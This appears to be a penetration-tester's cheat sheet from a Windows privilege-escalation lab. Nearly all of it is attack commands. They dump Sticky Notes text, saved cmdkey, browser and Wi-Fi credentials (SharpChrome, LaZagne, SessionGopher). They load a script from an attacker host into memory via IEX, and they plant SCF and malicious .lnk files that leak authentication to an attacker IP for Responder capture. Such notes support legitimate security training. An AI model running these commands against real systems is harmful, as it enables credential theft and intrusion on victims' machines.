# Import ModuleImport-Module .\PSSQLite.psd1# Find DBls C:\Users\<user>\AppData\Local\Packages# Set Veriable$db ='C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'Invoke-SqliteQuery-Database $db -Query "SELECT Text FROM Note"| ft -wrap
Cmdkey Saved Credentials
cmdkey /list
Browser Credentials
https://github.com/GhostPack/SharpDPAPI
.\SharpChrome.exe logins /unprotect
Mail Credentials
https://github.com/dafthack/MailSniper
Lazagne Tool
https://github.com/AlessandroZ/LaZagne
.\lazagne.exe all
SessioniGopher
https://github.com/Arvanaghi/SessionGopher
# Import ModuleImport-Module .\SessionGopher.ps1# Run ToolInvoke-SessionGopher-Target WINLPE-SRV01
WIFI Passwords
# View Saved Credentialsnetsh wlan show profile# Retrieve Saved Wireless Passwordnetsh wlan show profile ilfreight_corp key=clear
Network Capture
# Host this ps1 Scriptwhile($true){ $process =Get-WmiObject Win32_Process |Select-Object CommandLineStart-Sleep1 $process2 =Get-WmiObject Win32_Process |Select-Object CommandLineCompare-Object-ReferenceObject $process -DifferenceObject $process2}# Run in Memory on the targetIEX (iwr 'http://10.10.10.205/procmon.ps1')
SCF on a File Share
# Save as @file.scf[Shell]Command=2IconFile=\\10.10.14.3\share\legit.ico[Taskbar]Command=ToggleDesktop# Start Respondersudo responder -wrf -v -I tun0
Malicious Ink File
$objShell =New-Object-ComObject WScript.Shell$lnk = $objShell.CreateShortcut("C:\legit.lnk")$lnk.TargetPath ="\\<attackerIP>\@pwn.png"$lnk.WindowStyle =1$lnk.IconLocation ="%windir%\system32\shell32.dll, 3"$lnk.Description ="Browsing to the directory where this file is saved will trigger an auth request."$lnk.HotKey ="Ctrl+Alt+O"$lnk.Save()